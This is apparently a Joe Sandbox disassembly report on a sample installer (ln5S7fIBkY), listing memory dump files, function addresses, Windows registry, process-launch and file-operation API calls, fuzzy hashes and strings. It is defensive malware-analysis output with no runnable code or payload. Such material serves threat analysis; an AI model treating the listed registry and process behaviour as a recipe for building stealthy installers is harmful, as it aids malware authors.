Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
API String ID: 1892508949-2745823915
Opcode ID: 9e5626dcab178d18660621b241e7a2734acb43fa84c417fb4ea69048e5d5e0e9
Instruction ID: 83f66e59323efd8676d207054edf3c08df55f1f8244358cc2c8da33562713246
Opcode Fuzzy Hash: 9e5626dcab178d18660621b241e7a2734acb43fa84c417fb4ea69048e5d5e0e9
Instruction Fuzzy Hash: 1811D031504500EBCF20BFA1CD0199E36A0EF15329B28493FFA45B22F1DB3E89919A5E

Function 00406165 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,004063D9,80000002), ref: 004061AB
RegCloseKey.KERNELBASE(?,?,004063D9,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,halituses), ref: 004061B6

Strings

: Completed, xrefs: 0040616C

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: f8c60df0673843c4a96ed35a73ceba2ba355a7ad566f59c539dda5576aee505e
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: B301BC72500219EADF21CF50CC09EDB3BA8EB04360F01803AFD16A6191E778D964CBA4

Function 00405880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
CloseHandle.KERNEL32(?), ref: 004058B6

Strings

Error launching installer, xrefs: 00405893

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
Instruction ID: b039bfc1fd8153a77b97507ee8e8b42fe9752dbefc529c56e43fdfa491991b30
Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
Instruction Fuzzy Hash: 6CE0B6F5600209BFFB00AF64ED09E7B7BACEB58605F058525BD51F2290D6B998148A78

Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040205D

Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,76F923A0), ref: 0040535A
Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 004020EB

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 7a25ddf71574e17a44a7b6d6d2d8623a607b9bc29b791e8d98a732f6a3ef313a
Instruction ID: 589db8f59639f89aa10495d7cc04380c60c8a7cdceb46225d1e949d191b74c22
Opcode Fuzzy Hash: 7a25ddf71574e17a44a7b6d6d2d8623a607b9bc29b791e8d98a732f6a3ef313a
Instruction Fuzzy Hash: 51218071D00205AACF20AFA5CE4999E7A70BF04358F74813BF511B51E0DBBD8991DB6A

Function 004023E4 Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0040B5A8,00000023,?,00000000,00000002,00000011,00000002), ref: 0040242F
RegSetValueExW.KERNELBASE(?,?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 0040246F
RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: CloseValuelstrlen
String ID:
API String ID: 2655323295-0
Opcode ID: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
Instruction ID: 82080937d165882f0efaaa77ae0bb3c7350c3cd8b3028382441b60bd8f3f090b
Opcode Fuzzy Hash: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
Instruction Fuzzy Hash: 60118171D00104BEEF10AFA5DE89EAEBAB4EB44754F11803BF504B71D1DBB88D419B28

Function 00402259 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004065DA: FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,?,76F93420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76F93420), ref: 004065E5
Part of subcall function 004065DA: FindClose.KERNELBASE(00000000), ref: 004065F1

lstrlenW.KERNEL32 ref: 00402299
lstrlenW.KERNEL32(00000000), ref: 004022A4
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
Instruction ID: bbe877ab11025427faf5f2d41b675fbfdb26c0ea37d129f2242468f609b66021
Opcode Fuzzy Hash: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
Instruction Fuzzy Hash: 74117071D10314AADF10EFF98A4999EB7B8AF04344F14847FA805F72D1D6B8C4418B59

Function 004024F8 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 0040253E
RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 95b9409de080be2480ae3ebee57d62febf19c414c59d57b92fdc5ca9ae51cd4c
Instruction ID: aff41db5cb1f43c080787ec2daae132adce55f0eb50407644cc943dfdce05a74
Opcode Fuzzy Hash: 95b9409de080be2480ae3ebee57d62febf19c414c59d57b92fdc5ca9ae51cd4c
Instruction Fuzzy Hash: 59018471904204BFEB149F95DE88ABF7ABCEF80348F14803EF505B61D0DAB85E419B69

Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: ef205e07a954bd81c45d0a02b1537dcbd35f0958168012aad3e58056c5502209
Instruction ID: 1ba22ac92ecf447665b3913d31df39b0814a7bcf15a964c104b9173a467dca89
Opcode Fuzzy Hash: ef205e07a954bd81c45d0a02b1537dcbd35f0958168012aad3e58056c5502209
Instruction Fuzzy Hash: 2A119431910205EBDB14DFA4CA585AE77B4FF44348F20843FE445B72C0D6B85A41EB5A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D

Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004023B0
RegCloseKey.ADVAPI32(00000000), ref: 004023B9

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: abe2d5b86983b76f37ebbeb52e479933b9f051492a06271b13e7fa2919bd31b5
Instruction ID: ea1e1dc52e0dd693c7e9773bcfdc4231a80a88f887ae940f22e44fa758f22ebe
Opcode Fuzzy Hash: abe2d5b86983b76f37ebbeb52e479933b9f051492a06271b13e7fa2919bd31b5
Instruction Fuzzy Hash: 4CF06232A045119BE704ABA49B8EABE72A4AB44354F29403FFA42F71C1CAF85D41576D

Function 004053D2 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004053E2

Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C

CoUninitialize.COMBASE(00000404,00000000), ref: 0040542E

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
Instruction ID: 958387d264b6e353c5d11acff8941ae2ccbfc231999d5e23939142942d374e26
Opcode Fuzzy Hash: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
Instruction Fuzzy Hash: A8F024735009108BD3402B40ED02B6773A4EBC5301F05C03FEE84B22E1CB780C408B1E

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 00401587
ShowWindow.USER32(?), ref: 0040159C

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

